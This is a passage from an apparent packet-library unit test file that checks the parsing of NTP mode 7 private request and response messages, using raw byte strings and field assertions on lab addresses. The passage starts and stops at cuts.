b'\x97\x02\x03\x01\x00\x02\x00H\xc0\xa8ze\xc0\xa8zl\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zm\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x01\x02\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) - -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 1) -assert(isinstance(x, NTPInfoPeerSummary) for x in p.data) -assert(p.data[0].srcaddr == "192.168.122.108") - - -= NTP Private (mode 7) - REQ_PEER_STATS (1) - request -s = b'\x17\x00\x03\x03\x00\x01\x00 \xc0\xa8ze\x00{\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 3) -assert(isinstance(p.req_data[0], NTPInfoPeerList)) - - -= NTP Private (mode 7) - REQ_PEER_STATS (2) - response -s = b'\x97\x00\x03\x03\x00\x01\x00x\xc0\xa8zf\xc0\xa8ze\x00{\x00\x01\x01\x00\x10\x06\x00\x00\x00)\x00\x00\x00\x1e\x00\x02\xda|\x00\x00\x00\xbc\x00\x00\x00\x00\x00\x00\x0b\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x07\x00\x00\x00\x00\xde\x7fB\x89\x00<\x8d\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) - -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 3) -assert(isinstance(x, NTPInfoPeerStats) for x in p.data) - - -= NTP Private (mode 7) - REQ_SYS_INFO (1) - request -s = b'\x17\x00\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) - -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 4) - - -= NTP Private (mode 7) - REQ_SYS_INFO (2) - response -s = b'\x97\x00\x03\x04\x00\x01\x00P\x7f\x7f\x01\x00\x03\x00\x0b\xf0\x00\x00\x00\x00\x00\x00\x03\x06\x7f\x7f\x01\x00\xdb<\xca\xf3\xa1\x92\xe1\xf7\x06\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x07\x00\x00\x00\x00\xde\x7fB\x89\x00<\x8d\xc5' -p = NTP(s) - -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 4) -assert(isinstance(p.data[0], NTPInfoSys)) -assert(p.data[0].peer == "127.127.1.0") -assert(p.data[0].peer_mode == 3) -assert(p.data[0].leap == 0) -assert(p.data[0].stratum == 11) -assert(p.data[0].precision == 240) -assert(p.data[0].refid == "127.127.1.0") - - -= NTP Private (mode 7) - REQ_SYS_STATS (1) - request -s = b'\x17\x00\x03\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 5) - - -= NTP Private (mode 7) - REQ_SYS_STATS (2) - response -s = b'\x97\x00\x03\x05\x00\x01\x00,\x00\x02\xe2;\x00\x02\xe2;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b%\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b%\x00\x00\x00\x00\x00\x00\x0b=\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 5) -assert(isinstance(p.data[0], NTPInfoSysStats)) -assert(p.data[0].timeup == 188987) -assert(p.data[0].received == 2877) - - -= NTP Private (mode 7) - REQ_IO_STATS (1) - request -s = b'\x17\x00\x03\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 6) - - -= NTP Private (mode 7) - REQ_IO_STATS (2) - response -s = b'\x97\x00\x03\x06\x00\x01\x00(\x00\x00\x03\x04\x00\n\x00\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00\xd9\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00J' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 6) -assert(p.data[0].timereset == 772) -assert(p.data[0].sent == 217) - - -= NTP Private (mode 7) - REQ_MEM_STATS (1) - request -s = b'\x17\x00\x03\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 7) - - -= NTP Private (mode 7) - REQ_MEM_STATS (2) - response -s = b'\x97\x00\x03\x07\x00\x01\x00\x94\x00\x00\n\xee\x00\x0f\x00\r\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 7) -assert(p.data[0].timereset == 2798) -assert(p.data[0].totalpeermem == 15) -assert(p.data[0].freepeermem == 13) -assert(p.data[0].findpeer_calls == 60) -assert(p.data[0].hashcount[25] == 1 and p.data[0].hashcount[89] == 1) - - -= NTP Private (mode 7) - REQ_LOOP_INFO (1) - request -s = b'\x17\x00\x03\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 8) - - -= NTP Private (mode 7) - REQ_LOOP_INFO (2) - response -s = b'\x97\x00\x03\x08\x00\x01\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 8) -assert(p.data[0].last_offset == 0.0) -assert(p.data[0].watchdog_timer == 4) - - - -= NTP Private (mode 7) - REQ_TIMER_STATS (1) - request -s = b'\x17\x00\x03\t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 9) - - -= NTP Private (mode 7) - REQ_TIMER_STATS (2) - response -s = b'\x97\x00\x03\t\x00\x01\x00\x10\x00\x00\x01h\x00\x00\x01h\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 9) -assert(p.data[0].timereset == 360) -assert(p.data[0].alarms == 360) - - -= NTP Private (mode 7) - REQ_CONFIG (1) - request -s = b'\x17\x80\x03\n\x00\x01\x00\xa8\xc0\xa8zm\x01\x03\x06\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xec\x93\xb1\xa8\xa0a\x00\x00\x00\x01Z\xba\xfe\x01\x1cr\x05d\xa1\x14\xb1)\xe9vD\x8d' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 10) -assert(p.nb_items == 1) -assert(p.data_item_size == 168) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfPeer)) -assert(p.req_data[0].peeraddr == "192.168.122.109") -assert(p.req_data[0].hmode == 1) -assert(p.req_data[0].version == 3) -assert(p.req_data[0].minpoll == 6) -assert(p.req_data[0].maxpoll == 10) -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'5abafe011c720564a114b129e976448d') - - -= NTP Private (mode 7) - REQ_CONFIG (2) - response -s = b'\x97\x00\x03\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 10) -assert(p.err == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) - - -= NTP Private (mode 7) - REQ_UNCONFIG (1) - request -s = b'\x17\x80\x03\x0b\x00\x01\x00\x18\xc0\xa8zk\x00\x00\x00\x00X\x88P\xb1\xff\x7f\x00\x008\x88P\xb1\xff\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xf0\x1bq\xc8\xe5\xa6\x00\x00\x00\x01\x1dM;\xfeZ~]Z\xe3Ea\x92\x9aE\xd8%' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 11) -assert(p.nb_items == 1) -assert(p.data_item_size == 24) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfUnpeer)) -assert(p.req_data[0].peeraddr == "192.168.122.107") -assert(p.req_data[0].v6_flag == 0) -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'1d4d3bfe5a7e5d5ae34561929a45d825') - - -= NTP Private (mode 7) - REQ_UNCONFIG (2) - response -s = b'\x97\x00\x03\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 11) -assert(p.err == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) - - -= NTP Private (mode 7) - REQ_RESADDFLAGS (1) - request -s = b'\x17\x80\x03\x11\x00\x01\x000\xc0\xa8zi\xff\xff\xff\xff\x04\x00\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xf0V\xa9"\xe6_\x00\x00\x00\x01>=\xb70Tp\xee\xae\xe1\xad4b\xef\xe3\x80\xc8' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 17) -assert(p.nb_items == 1) -assert(p.data_item_size == 48) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfRestrict)) -assert(p.req_data[0].addr == "192.168.122.105") -assert(p.req_data[0].mask == "255.255.255.255") -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'3e3db7305470eeaee1ad3462efe380c8') - - -= NTP Private (mode 7) - REQ_RESSUBFLAGS (1) - request -s = b'\x17\x80\x03\x12\x00\x01\x000\xc0\xa8zi\xff\xff\xff\xff\x00\x10\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xf0F\xe0C\xa9@\x00\x00\x00\x01>e\r\xdf\xdb\x1e1h\xd0\xca)L\x07k\x90\n' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 18) -assert(p.nb_items == 1) -assert(p.data_item_size == 48) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfRestrict)) -assert(p.req_data[0].addr == "192.168.122.105") -assert(p.req_data[0].mask == "255.255.255.255") -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'3e650ddfdb1e3168d0ca294c076b900a') - - -= NTP Private (mode 7) - REQ_RESET_PEER (1) - request -s = b"\x17\x80\x03\x16\x00\x01\x00\x18\xc0\xa8zf\x00\x00\x00\x00X\x88P\xb1\xff\x7f\x00\x008\x88P\xb1\xff\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xef!\x99\x88\xa3\xf1\x00\x00\x00\x01\xb1\xff\xe8\xefB=\xa9\x96\xdc\xe3\x13'\xb3\xfc\xc2\xf5" -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 22) -assert(p.nb_items == 1) -assert(p.data_item_size == 24) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfUnpeer)) -assert(p.req_data[0].peeraddr == "192.168.122.102") -assert(p.req_data[0].v6_flag == 0) - - -= NTP Private (mode 7) - REQ_AUTHINFO (1) - response -s = b'\x97\x00\x03\x1c\x00\x01\x00$\x00\x00\x01\xdd\x00\x00\x00\x02\x00\x00\x00\n\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\x01' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 28) -assert(p.err == 0) -assert(p.nb_items == 1) -assert(p.data_item_size == 36) -assert(hasattr(p, 'data')) -assert(isinstance(p.data[0], NTPInfoAuth)) -assert(p.data[0].timereset == 477) -assert(p.data[0].numkeys == 2) -assert(p.data[0].numfreekeys == 10) -assert(p.data[0].keylookups == 96) -assert(p.data[0].keynotfound == 0) -assert(p.data[0].encryptions == 9) -assert(p.data[0].decryptions == 47) -assert(p.data[0].expired == 0) -assert(p.data[0].keyuncached == 1) - - -= NTP Private (mode 7) - REQ_ADD_TRAP (1) - request -s = b'\x17\x80\x03\x1e\x00\x01\x000\x00\x00\x00\x00\xc0\x00\x02\x03H\x0f\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xedB\xdd\xda\x7f\x97\x00\x00\x00\x01b$\xb8IM.\xa61\xd0\x85I\x8f\xa7\'\x89\x92' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 1) -assert(p.request_code == 30) -assert(p.err == 0) -assert(p.nb_items == 1) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfTrap)) -assert(p.req_data[0].trap_address == '192.0.2.3') -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 